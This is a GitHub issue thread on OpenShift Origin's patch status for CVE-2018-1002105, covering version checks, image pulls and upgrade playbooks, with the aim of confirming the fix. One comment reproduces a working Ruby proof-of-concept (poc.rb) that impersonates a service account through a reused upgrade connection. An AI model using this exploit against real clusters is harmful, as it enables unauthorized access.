openshift / origin

Conformance test suite for OpenShift
http://www.openshift.org
Apache License 2.0

CVE-2018-1002105 #21606

Closed clcollins closed 4 years ago

clcollins commented 5 years ago

It appears that Kubernetes has patched v1.10.11, v1.11.5, and v1.12.3 for CVE-2018-1002105, the pod exec/attach/port-forward attack and API extension attack(s) that were disclosed yesterday(?). Downstream OCP has either a patch or a mitigation available. I don't see any mention of the CVE in Origin in either the issues or the commits yet (apologies if I'm missing something).

Is there a tracker for watching patches as they are applied to Origin, and once they land, can they be applied immediately using the documented OpenShift Ansible upgrade process? Or are changes needed there as well?

Thanks!

Edit: FWIW, we're running v3.11

mshutt commented 5 years ago

It kind of looks like a new openshift/origin-control-plane:v3.10.0 was released last night. I also saw this in the git log of the release-3.10 branch:

commit 8a7096453e33bb8992c6d3c3c90116a8088902b0
Merge: 6b8ad0e482 95d325e75e
Author: OpenShift Merge Robot <openshift-merge-robot@users.noreply.github.com>
Date:   Mon Dec 3 16:20:34 2018 -0800

    Merge pull request #21601 from deads2k/cve-23-ok-3.10

    UPSTREAM: 00000: Verify backend upgrade

I'd love to hear from the devs, though.

mshutt commented 5 years ago

Does anyone have a proof of concept or a test harness of sorts, short of checking the container version, besides reading the exploit write-up and figuring out how all of this port handling works?

mshutt commented 5 years ago

So four hours in and not a word? I know these bits are "free as in beer", but it's still important that the people drinking the free beer aren't drinking poison... If I didn't know better, I'd think the lack of messaging was by design.

Send my regards to whoever my Solutions Architect is now that he's a chief architect, as we are/were so close to at least getting pricing... But this... C'mon.

Is the origin-control-plane:v3.10.0 image pushed to Docker Hub last night free of this CVE or not?

jocelynthode commented 5 years ago

I would also like to know: will the fix be backported to 3.6?

mshutt commented 5 years ago

OK, in terms of 3.10, the binaries in the origin-control-plane:v3.10.0 container both have a symbol for proxy.getResponseCode and a version string that includes the first 8 chars of @deads2k's last merged PR.

# oc -n kube-system rsh master-api-[redacted]
sh-4.2# nm openshift | egrep getResponseCode
00000000014b79b0 t github.com/openshift/origin/vendor/k8s.io/apimachinery/pkg/util/proxy.getResponseCode
sh-4.2# ./openshift version
openshift v3.10.0+8a70964-87

https://github.com/deads2k/origin/blob/95d325e75e35a477ab416a4eefc0182579705ec5/vendor/k8s.io/kubernetes/staging/src/k8s.io/apimachinery/pkg/util/proxy/upgradeaware.go#L374

func getResponseCode(r io.Reader) (int, []byte, error) - this method was added with the patch

commit 8a7096453e33bb8992c6d3c3c90116a8088902b0 (HEAD -> release-3.10, origin/release-3.10)
Merge: 6b8ad0e482 95d325e75e
Author: OpenShift Merge Robot <openshift-merge-robot@users.noreply.github.com>
Date:   Mon Dec 3 16:20:34 2018 -0800

    Merge pull request #21601 from deads2k/cve-23-ok-3.10

    UPSTREAM: 00000: Verify backend upgrade

mshutt commented 5 years ago

OK, all my whining aside, we got through rolling 3.10.0 (redux) into the control plane no problem...

Lukasz-Sagittarius-Strzelec commented 5 years ago

Some questions:
Does this backport mitigate the API extension attack (OCP 3.6 -> 3.11)? What about the pod exec/attach/port-forward attack (OCP 3.2 -> 3.11)? And what about the 3.9 version: can we expect updates there as well, and how was that one solved?

Thanks in advance

rhnewtron commented 5 years ago

Generally speaking, there is no confirmation yet that the fix above actually addresses this issue. It would help if a developer could confirm that this is fixed by that commit, and from which date on the latest Docker images contain the fix.

Lazast commented 5 years ago

Any progress?

mirekphd commented 5 years ago

You can test for the presence of this vulnerability in the latest build of OKD using this container from Gravitational (the gravitational/cve-2018-1002105:latest image is hosted on Quay, and itself shows no vulnerabilities): https://github.com/gravitational/cve-2018-1002105

gfvirga commented 5 years ago

I am on the latest v3.11 and I am getting:

[root@baleia cve-2018-1002105]# go run main.go
Attempting to locate and load kubeconfig file
Loading: /root/.kube/config
Testing for unauthenticated access...
API allows unauthenticated access
Testing for privilege escalation...
API is vulnerable to CVE-2018-1002105

Lukasz-Sagittarius-Strzelec commented 5 years ago

@gfvirga I have the same issue. I'm using v3.9.0 with the mitigation applied and get the same output. When you look at the code, the first step simply tests https:///apis, but the thing is that this returns a valid answer (almost always); the listed endpoints are not available to an unauthenticated user. The same goes for the pod test :( I guess the first test is not really a good one, and the second can't be treated as a trusted one either.

Or... I'm simply doing something wrong :)

mshutt commented 5 years ago

You can't hit the loadbalancer. It caught me at first, but I saw in the README.md that this is a known problem. I find it best to create a new kubeconfig and feed it into the container, or pass it to the Go app.

You also need to be able to list pods in all namespaces, as well as list all namespaces, since that is this app's discovery process... In other words, create a clusterrole (and a clusterrolebinding; a sketch of the binding follows the YAML below):

# oc get clusterroles/listns -o yaml
apiVersion: authorization.openshift.io/v1
kind: ClusterRole
metadata:
  name: listns
rules:
- apiGroups:
  - ""
  attributeRestrictions: null
  resources:
  - namespaces
  - pods
  verbs:
  - get
  - list
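
A binding is needed as well. Here's a minimal sketch of one; note that this uses the standard RBAC API rather than the legacy OpenShift one, and the subject name/namespace are placeholders for whatever account actually runs the scanner:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: listns
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: listns
subjects:
- kind: ServiceAccount
  name: cve-scanner        # placeholder: the account that runs the test
  namespace: default
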
mirekphd commented 5 years ago

I found a simple test (exploit) described in this blog post by Ariel Zalivansky (the author used Ubuntu, but you can port it easily to CentOS/RHEL):

apt-get update && apt-get install -y ruby git
git clone https://gist.github.com/2d09ec0ad600667980359394a2a65a0d.git
cd 2d09ec0ad600667980359394a2a65a0d/ 
chmod +x poc.rb
./poc.rb

Note that before executing the Ruby script in the final line, you will probably need to modify the `host = 'kubernetes'` variable in your local copy of poc.rb.

For posterity, poc.rb contains the following code:

#!/usr/bin/env ruby

require 'socket'
require 'openssl'
require 'json'

host = 'kubernetes'                       # API server address; adjust for your cluster
metrics = '/apis/metrics.k8s.io/v1beta1'  # an aggregated API served through the apiserver proxy

sock = TCPSocket.new host, 443
ssl = OpenSSL::SSL::SSLSocket.new sock
ssl.sync_close = true
ssl.connect

# A failing upgrade request that leaves the proxied connection to the aggregated API server open.
ssl.puts "GET #{metrics} HTTP/1.1\r\nHost: #{host}\r\nUpgrade: WebSocket\r\nConnection: upgrade\r\n\r\n"
6.times { puts ssl.gets }
# The next request rides the same backend connection, so the impersonation header is trusted.
ssl.puts "GET #{metrics}/pods HTTP/1.1\r\nHost: #{host}\r\nX-Remote-User: system:serviceaccount:kube-system:horizontal-pod-autoscaler\r\n\r\n"
6.times { puts ssl.gets }

puts JSON.pretty_generate JSON.parse ssl.gets

ssl.close

rhnewtron commented 5 years ago

Actually, I tested this procedure manually and was able to exploit the CVE when both pods run on the same node. I tried the same on 3.11 (installed 60 minutes ago) and it does not seem to be exploitable.

skynardo commented 5 years ago

> OK, all my whining aside, we got through rolling 3.10.0 (redux) into the control plane no problem...

We upgraded one of our environments from 3.9 to 3.10 four days ago and appear to have the patched version:

sh-4.2# openshift version
openshift v3.10.0+8a70964-87

We previously upgraded another environment (12 days ago) and, as expected, it has the not-yet-patched version of 3.10:

sh-4.2# openshift version
openshift v3.10.0+9e57eff-83

However, re-running /usr/share/ansible/openshift-ansible/playbooks/byo/openshift-cluster/upgrades/v3_10/upgrade.yml on this environment does not upgrade it; the control plane binaries remain at openshift v3.10.0+9e57eff-83.

@mshutt How did you update your existing 3.10 environment?

mshutt commented 5 years ago

Howdy @skynardo. I just wrote a playbook that does a docker pull... and if changed, it does the /usr/local/bin/restart-masters (or something like that) for both the api and controller... and it has a serial of 1 and a delay period between iterations.
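
Roughly along these lines; this is a sketch only, and the image tag, the master-restart helper path, and the "masters" inventory group are assumptions pieced together from this thread rather than the exact playbook:

- hosts: masters
  serial: 1                    # roll one master at a time
  become: true
  tasks:
  - name: Pull the rebuilt control-plane image
    command: docker pull docker.io/openshift/origin-control-plane:v3.10.0
    register: pull_result
    changed_when: "'Downloaded newer image' in pull_result.stdout"

  - name: Restart the API static pod
    command: /usr/local/bin/master-restart api
    when: pull_result is changed

  - name: Restart the controllers static pod
    command: /usr/local/bin/master-restart controllers
    when: pull_result is changed

  - name: Let the control plane settle before moving to the next master
    pause:
      seconds: 60
    when: pull_result is changed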

skynardo commented 5 years ago

Thanks, will give that a go.

edusouzaxx commented 5 years ago

I use version 3.7. Will there be a patch available for this version?

morodin commented 5 years ago

@mshutt Would it be possible to share that playbook?

skynardo commented 5 years ago

@morodin, I can share the commands I ran remotely from our Ansible server using the shell module:

ansible masters[0] -m shell -a "docker pull docker.io/openshift/origin-control-plane:v3.10"
ansible masters[0] -m shell -a "/usr/local/bin/master-restart api"
ansible masters[0] -m shell -a "/usr/local/bin/master-restart controllers"

mshutt commented 5 years ago

That only gets one master but....

mshutt commented 5 years ago

And I'm not sure that :v3.10 tag is right... we used v3.10.0.

morodin commented 5 years ago

Thanks for that, it might be easier than running the upgrade playbook (which seemed to work in our case).

clcollins commented 5 years ago

@morodin - we ran the upgrade playbook too. I still had to manually pull the new images for some reason.

We also ran into issues with the origin-node container stopping but not being removed, so the systemd origin-node.service would not start, and I had to delete the container with runc to get it to continue. Did you run into either of those issues?
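
(If it helps anyone, a rough Ansible sketch of that manual cleanup is below; the runc delete step and the unit name are assumptions based on what I described above, not a tested recipe.)

- hosts: nodes
  become: true
  tasks:
  - name: Remove the stopped origin-node runc container if it is still registered
    command: runc delete --force origin-node
    failed_when: false           # ignore the error if the container is already gone

  - name: Start the origin-node systemd unit again
    systemd:
      name: origin-node
      state: started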

morodin commented 5 years ago

@clcollins No, our upgrade ran through without issues, pulling version "v3.10.0+8a70964-87", which should be the patched one.

skynardo commented 5 years ago

@clcollins when you say origin-node container, are you referring to the sync pods in the openshift-node project? I see that these pods are still running openshift v3.10.0+9e57eff-83 in our environment that was upgraded to 3.10 prior to the fix. @mshutt, thanks for the correction on v3.10.0.

morodin commented 5 years ago

@skynardo That was @clcollins who made that statement.

skynardo commented 5 years ago

@morodin, are you saying that you had an existing 3.10 environment that was NOT at v3.10.0+8a70964-87, and you ran the upgrade playbook again and it deployed the patched version (v3.10.0+8a70964-87)? I have not been able to make that work. I might try newer playbooks today.

morodin commented 5 years ago

@skynardo Yes, that is exactly what I did, just using the 3.10 upgrade playbook from the CentOS openshift-ansible package.

clcollins commented 5 years ago

@skynardo: Not the sync pod, but the origin-node container run by the systemd origin-node service with runc, from /etc/systemd/system/origin-node.service:

# runc list
ID              PID         STATUS      BUNDLE                                       CREATED                          OWNER
origin-node     29457       running     /var/lib/containers/atomic/origin-node.0     2018-12-12T15:06:09.801904732Z   root

I think the sync pod from the sync daemonset is running via Docker:

docker ps |grep sync
042835e362c3        8546ec1d6700          "/bin/bash -c '#!/..."   2 days ago          Up 2 days 

That's not the one that failed to be removed.

ferryvanmaurik commented 5 years ago

Does this patch for 3.7 also work with OKD? https://access.redhat.com/errata/RHSA-2018:2906

skynardo commented 5 years ago

@clcollins, I don't have runc installed on my masters/nodes. Are you running a containerized install, maybe?
I did try to run the latest version of the 3.10 playbooks and they fail when trying to restart the node service on master[0]. We are running Origin 3.10 on AWS EC2 using the advanced install method, upgraded from a 3.9 cluster.

systemctl status origin-node
● origin-node.service - OpenShift Node
   Loaded: loaded (/etc/systemd/system/origin-node.service; enabled; vendor preset: disabled)
   Active: active (running) since Thu 2018-12-20 12:02:43 UTC; 8h ago
     Docs: https://github.com/openshift/origin
 Main PID: 3712 (hyperkube)
   Memory: 67.9M
   CGroup: /system.slice/origin-node.service
   ...

clcollins commented 5 years ago

@skynardo: Ah, yes, sorry - we are using the containerized install on Atomic hosts. We're using 3.11, with on-prem virtual machines.

mirekphd commented 5 years ago

If you need an unofficial confirmation that CVE-2018-1002105 was patched in OKD (master branch head) on Nov 08, just compare the openshift/origin patch to upgradeaware.go with the original kubernetes/kubernetes patch: they are identical.

Patch to Kubernetes' upgradeaware.go: Verify backend upgraded connection

Patch to OKD's upgradeaware.go: (just click Load Diff) UPSTREAM: 00000: Verify backend upgrade

The patched file is here. This issue should remain open until we get a release incorporating the patch. Most likely there will be no backports to older versions...

mshutt commented 5 years ago

@mirekphd I'd personally leave it open in protest. The CVE was so heinous that free as in beer vs. free as in speech ought not even be a matter for discussion.

That said, it is patched clear back to at least the 3.9 release branch, I believe. Binaries (containers) were stealth-cut for at least 3.10, and I presume other releases as well.

der-ali commented 5 years ago

I am running OKD 3.9 with the advanced installation. I am not really sure how to patch it. Any idea?

smarterclayton commented 5 years ago

This went out back to 3.9 when the embargo was lifted, and rolling images and RPMs were built at that time (with the CentOS PaaS SIG releasing new RPMs).

There was a discussion on the mailing list about why the rolling-release model is used, but it effectively allows us to ensure new clusters and new nodes are always at the latest. It does mean that you need to run an upgrade or pull the latest images on control plane nodes, but that's always been the case.

smarterclayton commented 5 years ago

https://lists.openshift.redhat.com/openshift-archives/dev/2018-December/msg00014.html

I think I was wrong about this; it looks like David did backport it, so it would have been in the RPMs published to GCS and the rolling images.

jocelynthode commented 5 years ago

@smarterclayton hey, thanks for the answer. However, I see that the PaaS SIG repos still have no updates, which leaves a lot of OpenShift Origin users in a vulnerable state.

From what I read on the mailing list, they need a git tag to be able to build a new version. Could you please either create a v3.11.1 tag or recreate the v3.11 tag so that the PaaS SIG can rebuild the RPMs with the patch?

smarterclayton commented 5 years ago

@DanyC97 can you describe why you need a tag to rebuild? Can't you just generate a patch-level build by refreshing the source tar?

jocelynthode commented 5 years ago

@smarterclayton re-reading the mailing list just now: he asked for a release, and I assumed @DanyC97 meant a git tag, but maybe it is a GitHub release? For clarity, here is the quote:

the fix to make it into 3.11/3.10 Origin branches => done [1] however i am just guessing those are the right PRs, someone from RH will need to confirm/ refute a new Origin release to be cut for 3.11/3.10 then i can start with the PaaS Sig work

zoobab commented 5 years ago

Is it fixed or not in Origin?

leoluk commented 5 years ago

It's mostly fixed.

The PRs were backported to the 3.10 and 3.11 branches and the Docker containers were rebuilt: https://hub.docker.com/r/openshift/origin-control-plane/tags

However, the CentOS PaaS release repos were NOT rebuilt, so if you run a non-containerized deployment with the master deployed from RPMs, you're still vulnerable, and you should upgrade to 3.11, which runs the master services via static kubelet pods.

okd/origin is a community effort, particularly the binary builds, and if you run it in production, I would highly recommend familiarizing yourself with the release and backporting process on GitHub so that you can see for yourself which fixes got backported. Support for older releases can be hit-and-miss.

If you want actionable security bulletins and dependable long-term support, a Red Hat subscription would be your best bet. Like any community project, OKD is more of a DIY solution (though very close to upstream).

openshift-bot commented 4 years ago

Issues go stale after 90d of inactivity.

Mark the issue as fresh by commenting /remove-lifecycle stale. Stale issues rot after an additional 30d of inactivity and eventually close. Exclude this issue from closing by commenting /lifecycle frozen.

If this issue is safe to close now please do so with /close.

/lifecycle stale

openshift-bot commented 4 years ago

Stale issues rot after 30d of inactivity.

Mark the issue as fresh by commenting /remove-lifecycle rotten. Rotten issues close after an additional 30d of inactivity. Exclude this issue from closing by commenting /lifecycle frozen.

If this issue is safe to close now please do so with /close.

/lifecycle rotten /remove-lifecycle stale

openshift-bot commented 4 years ago

Rotten issues close after 30d of inactivity.

Reopen the issue by commenting /reopen. Mark the issue as fresh by commenting /remove-lifecycle rotten. Exclude this issue from closing again by commenting /lifecycle frozen.

/close

openshift-ci-robot commented 4 years ago

@openshift-bot: Closing this issue.

In response to [this](https://github.com/openshift/origin/issues/21606#issuecomment-540174272):

> Rotten issues close after 30d of inactivity.
>
> Reopen the issue by commenting `/reopen`. Mark the issue as fresh by commenting `/remove-lifecycle rotten`. Exclude this issue from closing again by commenting `/lifecycle frozen`.
>
> /close

Instructions for interacting with me using PR comments are available [here](https://git.k8s.io/community/contributors/guide/pull-requests.md). If you have questions or suggestions related to my behavior, please file an issue against the [kubernetes/test-infra](https://github.com/kubernetes/test-infra/issues/new?title=Prow%20issue:) repository.